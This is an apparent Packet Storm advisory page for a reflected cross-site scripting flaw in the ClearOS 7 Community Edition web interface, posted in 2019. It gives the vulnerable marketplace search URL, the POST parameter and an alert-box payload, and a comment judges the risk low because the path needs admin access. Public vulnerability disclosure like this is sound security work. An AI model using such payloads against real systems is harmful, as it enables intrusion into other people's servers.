exploit the possibilities

ClearOS 7 Community Edition Cross Site Scripting

ClearOS 7 Community Edition Cross Site Scripting
Posted Mar 6, 2019
Authored by Ozer Goker

ClearOS 7 Community Edition suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 32b6322d24448d2348621b162c00e749

ClearOS 7 Community Edition Cross Site Scripting

Change Mirror Download
##################################################################################################################################
# Exploit Title: ClearOS 7 Community Edition | Cross-Site Scripting
# Date: 06.03.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.clearos.com
# Software Link:
http://mirror.clearos.com/clearos/7/iso/x86_64/ClearOS-DVD-x86_64.iso
# Version: 7
##################################################################################################################################

Introduction

ClearOS is a small business server operating system with server,
networking, and gateway functions. It is designed primarily for homes,
small, medium, and distributed environments. It is managed from a web based
user interface, but can also be completely managed and tuned from the
command line. ClearOS is available in a free Community Edition, which
includes available open source updates and patches from its upstream
sources. ClearOS is also offered in a Home and Business Edition which
receives additional testing of updates and only uses tested code for
updates. Professional tech-support is also available. Currently ClearOS
offers around 100+ different features which can be installed through the
onboard ClearOS Marketplace.

#################################################################################

XSS details

#################################################################################

XSS1 | Reflected

URL
https://192.168.2.104:81/app/marketplace/search

METHOD
Post

PARAMETER
search

PAYLOAD
' onmouseover=alert(1) '

#################################################################################

Comments (1)

RSS Feed Subscribe to this comment feed
daveloper

As you can tell from the URL, the location of the affected area of the web interface is in a privileged area of the website. This means that the user already has either root or other high level privileges. We have tested the unprivileged areas and the anonymous areas and do not see a vulnerability. The risk that this would be useful in an exploit is low since anyone able to access this path in the URL is likely already 'root'.

Comment by daveloper
2019-03-25 14:42:43 UTC | Permalink | Reply
Login or Register to post a comment

File Archive:

August 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    10 Files
  • 2
    Aug 2nd
    8 Files
  • 3
    Aug 3rd
    2 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    15 Files
  • 6
    Aug 6th
    79 Files
  • 7
    Aug 7th
    16 Files
  • 8
    Aug 8th
    11 Files
  • 9
    Aug 9th
    10 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    6 Files
  • 12
    Aug 12th
    26 Files
  • 13
    Aug 13th
    15 Files
  • 14
    Aug 14th
    19 Files
  • 15
    Aug 15th
    52 Files
  • 16
    Aug 16th
    11 Files
  • 17
    Aug 17th
    1 Files
  • 18
    Aug 18th
    2 Files
  • 19
    Aug 19th
    18 Files
  • 20
    Aug 20th
    19 Files
  • 21
    Aug 21st
    17 Files
  • 22
    Aug 22nd
    9 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close